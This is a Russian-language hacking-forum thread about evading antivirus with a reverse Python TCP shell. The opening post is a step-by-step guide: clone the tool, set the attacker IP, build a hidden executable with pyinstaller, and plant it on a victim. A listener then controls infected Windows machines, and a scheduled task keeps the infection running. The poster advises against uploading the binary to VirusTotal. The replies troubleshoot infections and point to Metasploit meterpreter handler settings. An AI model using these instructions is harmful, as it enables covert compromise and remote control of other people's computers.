Обход антивируса (Reverse Python Shell) 100% FUD

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем ~~DarkNode~~, 13 ноя 2016.

  1. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    19 окт 2016
    Сообщения:
    485
    Симпатии:
    1.620
    Привет.С вами DarkNode )
    Сегодня будем обходить антивирус через Python Reverse TCP Shell.
    ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)

    Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
    Довольно таки прикольно имхо)


    Состоит наш бэкдор опять же таки из двух частей:

    Серверная часть:
    reverse_tcp.py - вредоносный питоновоский скрипт ,который запускаеться на стороне жертвы
    может быть упакован в "exe" файл используя pyinstaller
    На windows машине , выполните команду:
    Код (Text):
    pyinstaller --noconsole --onefile --icon=iconfile.ico reverse_tcp.py
    для упаковки в бинарный файл.

    listener.js
    Простенький мультиклиентный листенер написанный на javascript(node.js)
    Команды:
    help
    exit --- выйти из listener
    list --- посмотреть список жертв
    connect num --- подкючится к одной жертве
    например 'connect 0' подключимся к жертве которая имеет идентификатор 0 в списке
    schedule n_minutes --- Планировщик задач|schedule attack(только для Windows only), принудительно указать время каждого конекта к атакуемой машине через определенный интервал в минутах


    Качаем:

    Код (Text):
    git clone https://github.com/shd101wyy/Python_Reverse_TCP.git
    Обход антивируса (Reverse Python Shell) 100% FUD

    How to Hack (для Windows)
    1)Меняем переменную attacker_ip в reverse_tcp.py на ip address атакуещего.
    Обход антивируса (Reverse Python Shell) 100% FUD

    2)Запускаем команду pyinstaller --noconsole --onefile reverse_tcp.py создаем reverse_tcp.exe
    Обход антивируса (Reverse Python Shell) 100% FUD

    3)Парим бинарник жертве
    4)Запускаем листенер командой nodejs listener.js и ждем конекта жертвы.
    Обход антивируса (Reverse Python Shell) 100% FUD
    Обход антивируса (Reverse Python Shell) 100% FUD


     
    molexuse, LiJagger, Overlynx и 7 другим нравится это.
  2. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
    скажи, пожалуйста, этот параметр нужно указывать в скрипте, или уже после того как получил сессию?
     
  3. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    19 окт 2016
    Сообщения:
    485
    Симпатии:
    1.620
    Это команда непосредственно в консоли управления (после запуска nodejs listener.js и когда жертва заразилась) задает интервал каждого последующего подключения.
    По умолчанию при запусуке вредоноса жертва будет подкючаться к тебе каждые 30 минут,так как это прописано в скрипте самом.Поэтому можно подредактировать скрипт под себя и опционально указать дефолтный интервал времени в reverse_tcp.py
    В даном случае поищи функцию функцию generateSheduleTask()
    В твоем случае просто можешь изменить в скрипте
    Код (Text):
    xml.write(generateScheduleTask(30))
    На
    Код (Text):
    xml.write(generateScheduleTask(Нужный_Интервал_В_Минутах))
    Обход антивируса (Reverse Python Shell) 100% FUD
     
    elusive94 и MAdDog719 нравится это.
  4. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
    Понял, спасибо)
     
    <<-D4rkN0d3_Falc0m->> нравится это.
  5. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
    чет не работает
    Обход антивируса (Reverse Python Shell) 100% FUD

    Обход антивируса (Reverse Python Shell) 100% FUD

    Обход антивируса (Reverse Python Shell) 100% FUD
     
  6. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
    я так понял ошибка потому что не установлен PyCrypto, но при установке возникает новая ошибка

    Обход антивируса (Reverse Python Shell) 100% FUD

    пока не знаю как побороть проблему
     
  7. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
    решил проблему установив Python 2.7 =)
     
  8. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
    При попытке получить сессию через msfconsole, вылетает ошибка на стороне жертвы
     
  9. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    19 окт 2016
    Сообщения:
    485
    Симпатии:
    1.620
    Метасплоит же не нужен тут...
    для этого есть listener.js
     
  10. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
    Подскажите в какой процес оно прячется?? Каждые 30 мин вылетает ошибка такая как на скрине 3. Уже и перезагружался не помогает.
     
  11. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    19 окт 2016
    Сообщения:
    485
    Симпатии:
    1.620
    Ошибка вылетает потому что листенер не запущен на стороне атакуещего...
    Обход антивируса (Reverse Python Shell) 100% FUD

    А посмотреть и удалить процес можно в планировщике заданий
    Выполнить команду на виндоус машине:
    Пуск--->Выполнить--->taskschd.msc
    Обход антивируса (Reverse Python Shell) 100% FUD

    Обход антивируса (Reverse Python Shell) 100% FUD
     
    valerian38 и MAdDog719 нравится это.
  12. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
    как бы да, но по моему у метасплоит куда больше возможностей, нежели у listener.js, хотя может я не разобрался как с ним работать, но пока могу только лазать по папкам жертвы, возможно есть способ залить через него какой то бекдор?
     
  13. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    19 окт 2016
    Сообщения:
    485
    Симпатии:
    1.620
    Легко)
    Вот написал как это очень легко делаться.
    Получить метерпретер сессию
     
    WebWare Team и MAdDog719 нравится это.
  14. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
  15. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Хорошая статья, спасибо.
     
    <<-D4rkN0d3_Falc0m->> нравится это.
  16. Drupa

    Drupa New Member

    Репутация:
    0
    Регистрация:
    23 дек 2016
    Сообщения:
    2
    Симпатии:
    0
    Инструмент хороший, все очень легко настроилось, без всяких проблем. вот только не пойму чачем такой сложный процесс перехвата нельзя ли просто
    exploit/multi/handler
    payload windows/meterpreter/reverse_tcp
    и все ?!

    не каким образом нет нормально соединения к meterpreter засисает подключении и больше рукопожатие не происходит
    как на скриншоте, значит только через listener.js возможно пользоваться
     

    Вложения:

    • Обход антивируса (Reverse Python Shell) 100% FUD
      1.jpg
      Размер файла:
      71,4 КБ
      Просмотров:
      21
    #16 Drupa, 23 дек 2016
    Последнее редактирование модератором: 24 дек 2016
  17. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    19 окт 2016
    Сообщения:
    485
    Симпатии:
    1.620
    Попробуй другой пейлоад:
    Обход антивируса (Reverse Python Shell) 100% FUD
     
  18. Drupa

    Drupa New Member

    Репутация:
    0
    Регистрация:
    23 дек 2016
    Сообщения:
    2
    Симпатии:
    0
    Попробовал конект происходит и тут же отключается как видно на скришноше. Что можно придумать ?

    ошибку я понял так : дисконект происходит потому, что exe отличается шифрованием поэтому этот пайлоад не может с ним работать. Если я не прав или что то не понимаю, прошу поправьте меня пожалуйста
     

    Вложения:

    #18 Drupa, 24 дек 2016
    Последнее редактирование: 24 дек 2016
  19. for(i=0;i<225;i++);

    for(i=0;i<225;i++); Active Member

    Репутация:
    0
    Регистрация:
    27 дек 2016
    Сообщения:
    33
    Симпатии:
    1
    что это он мне пишет??? я не могу понять инструкцию:( я выполняю комаеду---
    root@DDoS:~# git clone https://github.com/shd101wyy/Python_Reverse_TCP.git
    Клонирование в «Python_Reverse_TCP»…
    fatal: unable to access 'https://github.com/shd101wyy/Python_Reverse_TCP.git/': Received HTTP code 503 from proxy after CONNECT

    Могу ли я упаковать в exe на linux kali машине???
     
    #19 for(i=0;i<225;i++);, 9 янв 2017
    Последнее редактирование: 9 янв 2017
  20. ghostphisher

    ghostphisher гарант codeby
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    7 дек 2016
    Сообщения:
    1.605
    Симпатии:
    1.487
    Вот Вам же пишет система в чем проблема, не можете настроить связь через ТОР или прокси для всей системы - учите или качайте архивом через кнопку Download через браузер
    Обход антивируса (Reverse Python Shell) 100% FUD
     
Загрузка...
Похожие Темы - Обход антивируса (Reverse
  1. Brib
    Ответов:
    3
    Просмотров:
    200
  2. Vander
    Ответов:
    1
    Просмотров:
    729
  3. ~~DarkNode~~
    Ответов:
    6
    Просмотров:
    2.544
  4. Brib
    Ответов:
    15
    Просмотров:
    1.443
  5. PingVinich
    Ответов:
    4
    Просмотров:
    920

Поделиться этой страницей